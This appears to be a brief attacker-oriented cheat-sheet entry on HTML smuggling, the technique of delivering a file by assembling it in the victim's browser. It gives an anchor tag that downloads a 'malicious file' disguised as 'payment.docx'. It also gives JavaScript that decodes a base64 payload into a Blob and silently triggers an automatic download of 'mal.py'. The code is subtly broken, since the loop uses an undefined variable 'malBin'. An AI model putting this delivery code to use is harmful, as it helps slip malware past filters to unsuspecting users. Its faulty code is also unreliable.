HTML Smuggling

Attackers hosts a malicious file and can invite victim to download it using the HTML Smuggling technique.

- [html-smuggling-a-stealthier](https://www.cyfirma.com/outofband/html-smuggling-a-stealthier-approach-to-deliver-malware/)

Exploitation

Attackers can use anchor tag to invite victim to download a malicious file as below. When clicking, the malicious file is downloaded as the name “payment.docx”.

<a href="/malicious_doc.docx" download="payment.docx">Cliek Here</a>

Alternatively, attackers can also use JavaScript, then let browsers to download a malicious file when loading the page, or invite victim to click download button.

var a = document.createElement('a');
a.download = 'malicious_doc.docx'

Using JavaScript Blob

By using blob, attackers can let victim to download a malicious file while obfuscate its content by encoding/decoding malicious code.

// Decode Base64 encoded malicious code
var malBase64 = '<BASE64_ENCODED_CODE>';
var malBinStr = window.atob(malBase64);
var malLen = malBinStr.length;
var malBytes = new Uint8Array(malLen);
for (var i = 0; i < malLen; i++) {
    malBytes[i] = malBin.charCodeAt(i);
}

// Create a blob
// 'octet/stream' allows any file types.
var malBlob = new Blob([malBytes.buffer], {type: 'octet/stream'});
var malUrl = window.URL.createObjectURL(malBlob);

// Create a downloadable anchor (automatically download)
var a = document.createElement('a');
a.style.display = 'none';
a.href = malUrl;
a.download = 'mal.py';
document.body.appendChild(a);
// this anchor will be clicked automatically.
a.click();
document.body.removeChild(a);